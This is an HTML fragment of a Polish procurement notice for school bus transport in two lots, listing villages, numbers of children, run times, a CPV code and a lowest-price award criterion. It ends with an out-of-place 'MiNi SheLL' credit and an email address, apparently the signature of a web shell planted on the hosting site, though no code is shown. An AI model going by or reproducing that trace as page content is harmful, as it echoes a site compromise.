<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowozy do Zespołu Szkolno-Przedszkolnego Lubojna i do Zespołu Szkolnego Czarny Las.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 
dowóz dzieci z Lubojenki do Szkoły podstawowej w Lubojnie (30 dzieci,) oraz do Przedszkola w Lubojnie ( 5 dzieci ) , dowóz dzieci z Wierzchowiska, Kolonii Wierzchowiska, Florkowa, Woli Kiedrzyńskiej, Woli Hankowskiej, Antoniowa   do gimnazjum w Czarnym Lesie ( 44 dzieci) ,dowóz dzieci z Lubojny, Tylina, Kuźnicy Lechowej, Kuźnicy Kiedrzyńskiej  do gimnazjum w Czarnym Lesie ( 44  dzieci), dowóz dzieci z Kuźnicy Lechowej, Kuźnicy Kiedrzyńskiej do szkoły podstawowej w Czarnym Lesie  ( 45 dzieci ), 2 dzieci z Antoniowa  i 8 z Woli Hankowskiej  do szkoły podstawowej w Czarnym Lesie ; 7 dzieci z Czarnego Lasu   do przedszkola w Kuźnicy Kiedrzyńskiej   .

 Przybliżone godziny dowozu dzieci do szkół.
Dowóz dzieci od godziny 7.00 do 900. Rano przewidziane są dwa kursy do Czarnego Lasu ( jeden Kużnice plus Lubojna ; drugi Kolonia Wierzchowisko, Wierzchowisko , Wola Kiedrzyńska i Hankowska , Antoniów plus  jest jedna pętla ( wszystkie miejscowości  z dowozem dzieci  do gimnazjum w godzinach 9.30 do 10.30 oraz jeden dowóz z Lubojenki do Lubojny.  Odwóz w godzinach 1300 do 1700. .  Szczegółowe godziny odwozów i dowozów dzieci oraz miejsca przystanków zostaną  ustalone przez  dyrektorów placówek i przewoźników. Dowóz dzieci z Woli Hankowskiej - musi być zapewniony przejazd ulicą Dworską .
Musi być bezwzględnie przestrzegana zasada ,iż dzieci nie mogą być w trakcie dowozów  bez opieki .
Samochody ilością miejsc muszą być dostosowane do ilości przewożonych dzieci.
Podmiot realizujący zamówienie  ponosi pełną odpowiedzialność  za zapewnienie opieki dzieciom i młodzieży podczas dowozów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowozy dzieci do Zespołu Szkolnego Stary Cykarzew i Zespołu Szkolno-przedszkolnego w Borownie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2

-	dowóz dzieci do gimnazjum w Starym Cykarzewie (łącznie 64 dzieci ) w tym : ze Starego Broniszewa z wjazdem w ulicę Leśną do końca ,z Cykarzewa Północnego ,  z Cykarzewa Północnego Stacji, z Nowego Broniszewa, z Adamowa, z Rusinowa-łącznie 32 uczniów  , Grabówki  - 2 uczniów , z Nowego Kocina, ze Starego Kocina, Przedkocina , Lemańska , Cykarzewa Północnego ul. Rumiankowa (łącznie 30 dzieci), 
-	dowóz dzieci do SP w Starym Cykarzewie (łącznie 9 dzieci)  z  Grabówki  ; 13 dzieci   z Grabówki do przedszkola w Starym Cykarzewie ,
-	dowóz dzieci do SP i Gimnazjum w Borownie (łącznie 24 dzieci) z miejscowości Grabowa , w tym dzieci ze Szkoły Podstawowej 13 a z gimnazjum 10  oraz 1  dziecko z Grabowej do Przedszkola w Borownie  oraz 10 osób z Broniszewa do gimnazjum w Borownie   .
Dowóz dzieci z Broniszewa do gimnazjum w Borownie należy połączyć z dowozami dzieci z Broniszewa do Cykarzewa ( z przesiadką w Grabówce)

Przy dowozie dzieci z Grabowej należy przewidzieć dwa kursy rano i dwa popołudniu.
Przy dowozach do gimnazjum w Starym Cykarzewie należy dwa razy w tygodniu przewidzieć dwie duże pętle dowozów i odwozów ( Kociny łącznie z Broniszewem) .
W Grabówce należy przewidzieć wjazd w ul. Główną .
Dowozy - orientacyjne godziny 7.00 - 8.30
Odwozy  - orientacyjne godziny 12.45 - 16.00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com